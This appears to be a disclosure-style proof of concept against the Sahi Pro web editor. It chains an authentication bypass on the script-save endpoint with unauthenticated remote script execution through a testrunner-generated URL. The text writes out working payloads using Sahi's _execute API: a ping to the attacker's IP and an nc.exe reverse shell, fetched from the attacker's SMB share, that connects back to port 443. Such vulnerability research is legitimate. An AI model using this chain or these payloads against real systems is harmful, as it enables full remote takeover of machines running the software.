It was found in sahi web editor interface, we can set up password to protect from unauthenticated users to misuse the functionalities.
It was found that even with the password protected web portals , an attacker can still bypass and perform all the operations of the interface as there are no server side validations for each request. Here in this example we will demonstrate how an attacker can create any file within sahi pro scripts root folder. This can be extended to all the operations.
This impacts can be maximized with the help of remote execution of sahi scripts feature with the help of testrunner generated URL. As launching these remote execution does not require any kind of authentication / password , chained with the previous bug ( creation of sahi script remotely without password ) results in complete take over of the system running sahi pro .
Here is the detailed proof of concept for the same :
An attacker visits the server running sahi pro. He tries to access the remote editor interface as shown below .
Fig : Password protected login form.
As he observes that the console is password protected , he sends the script creation request directly to the EditorUI_saveScript end point as shown below.
Fig : direct request is sent to the end point with sahi script name and contents
( we make use of _execute API to execute system commands )
We have used fine name as rce.sah to be created and with contents as follows :
_execute(“ping 192.168.0.105 -n 5”);
Here , 192.168.0.105 is IP of attacker machine. We make use of ping as payload because, we already assumed web interface is password protected hence we cannot directly see the output of the log files executed.
This vulnerability can be chained further with the next vulnerability :
No password authentication for remote executions of sahi scripts . Testrunner.bat or distributed runs does not have any authentication mechanism that can help an attacker to initiate remote runs on machine . this can be abused to launch a denial of service attack or more severe, remote code execution chained with the previous one.
Fig : testrunner batch file converts the request to a URL request which is then fed to master_runNonDistributed / Distributed endpoints.
The url which is generated can be copied and can be used to launch any remote executions , just changing localhost to remote sahi server .
Attacker can the generated URL directly and execute any script he wants, in this case the malicious script he created that is “rce.sah” as follows :
here just changing suite get parameter , attacker can execute any suite/script of his choice . he executes the script he created before remotely as follows :
Fig : attacker executes his previously created script with the help of testrunner generated URL.
As the payload specified, if the execution is successful , attacker should get a ping request to his machine. This can be confirmed with the help of listening to icmp request using tcpdump as follows :
Tcpdump –I eth0 icmp –vv
Fig : as we can see attacker machine gets a ICMP echo ping request from remote victim machine running sahi pro .
Now we can confirm the remote code execution. Lets now maximize the impact by getting a complete shell of the victim machine. This can be done with many ways..i use SMB to host a reverse shell which is directly executed by remote server.(temporarily hosted on my attacker box ) to achieve the same(same network).
_execute(“\\\\192.168.0.105\\MENOE\\nc.exe -nv 192.168.0.105 443 -e cmd.exe“);
Fig : attacker creates another script with the payload specified above.
executing the script with the same unauthenticated endpoint results in code execution with receiving a proper reverse shell.
Fig : >> Reverse shell <<